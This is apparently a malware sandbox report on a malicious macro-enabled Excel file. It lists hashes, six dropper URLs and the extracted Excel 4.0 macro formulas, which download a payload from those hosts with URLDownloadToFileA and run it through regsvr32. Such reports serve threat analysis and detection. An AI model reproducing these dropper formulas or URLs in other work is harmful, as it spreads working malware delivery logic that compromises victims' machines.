Overview

overview

10

Static

static

10

3b5d013c37...f.xlsm

windows7-x64

10

3b5d013c37...f.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    3b5d013c37c74fca0fd47aeae9291713622161217d71c485259b2f2225a53adf

  • Size

    46KB

  • Sample

    241120-efzjksvnfn

  • MD5

    8e95b98faf06e03d1db8d7527ef39c78

  • SHA1

    207898de38b339bc4bb3b06e71fb689edc6193da

  • SHA256

    3b5d013c37c74fca0fd47aeae9291713622161217d71c485259b2f2225a53adf

  • SHA512

    99e1a5a544f3379092fd7db09229f0ba58e5edc40ade1342b5b5f9b988e212100bea3dc3407d7b8b42c4a7a8393a4d67b87c453e1c5130e8bd568328b527903e

  • SSDEEP

    768:AdolODOevZCwrvtMezdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfNN/u:GoIDHtT5fTR4Lh1NisFYBc3cr+UqVfNw

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://gymsportive.com/0zwe/pSiUh/

http://danialteb.com/wp-admin/NqRYgwPERRPoTs/

http://totalplaytuxtla.com/sitio/IduhreKcPbD/

http://skanev.com/wp-content/AT5Doj207guJES0BMk/

http://praachichemfood.com/old-files==-/vo68ZI/

http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://gymsportive.com/0zwe/pSiUh/
xlm40.dropper

http://danialteb.com/wp-admin/NqRYgwPERRPoTs/
xlm40.dropper

http://totalplaytuxtla.com/sitio/IduhreKcPbD/
xlm40.dropper

http://skanev.com/wp-content/AT5Doj207guJES0BMk/
xlm40.dropper

http://praachichemfood.com/old-files==-/vo68ZI/

Targets

    • Target

      3b5d013c37c74fca0fd47aeae9291713622161217d71c485259b2f2225a53adf

    • Size

      46KB

    • MD5

      8e95b98faf06e03d1db8d7527ef39c78

    • SHA1

      207898de38b339bc4bb3b06e71fb689edc6193da

    • SHA256

      3b5d013c37c74fca0fd47aeae9291713622161217d71c485259b2f2225a53adf

    • SHA512

      99e1a5a544f3379092fd7db09229f0ba58e5edc40ade1342b5b5f9b988e212100bea3dc3407d7b8b42c4a7a8393a4d67b87c453e1c5130e8bd568328b527903e

    • SSDEEP

      768:AdolODOevZCwrvtMezdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfNN/u:GoIDHtT5fTR4Lh1NisFYBc3cr+UqVfNw

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks